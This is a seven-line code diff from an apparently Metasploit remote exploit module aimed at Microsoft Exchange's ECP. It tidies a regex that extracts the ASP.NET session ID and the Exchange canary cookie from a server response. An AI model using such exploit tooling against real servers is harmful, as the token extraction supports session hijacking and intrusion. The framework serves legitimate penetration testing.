@@ -358,7 +358,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     if response.code == 241
-      session_id = response.get_cookies.scan(/ASP\.NET_SessionId=([\w\-]+);/).flatten[0]
+      session_id = response.get_cookies.scan(/ASP\.NET_SessionId=([\w-]+);/).flatten[0]
       canary = response.get_cookies.scan(/msExchEcpCanary=([\w\-_.]+);*/).flatten[0] # coin coin coin ...
     end
 
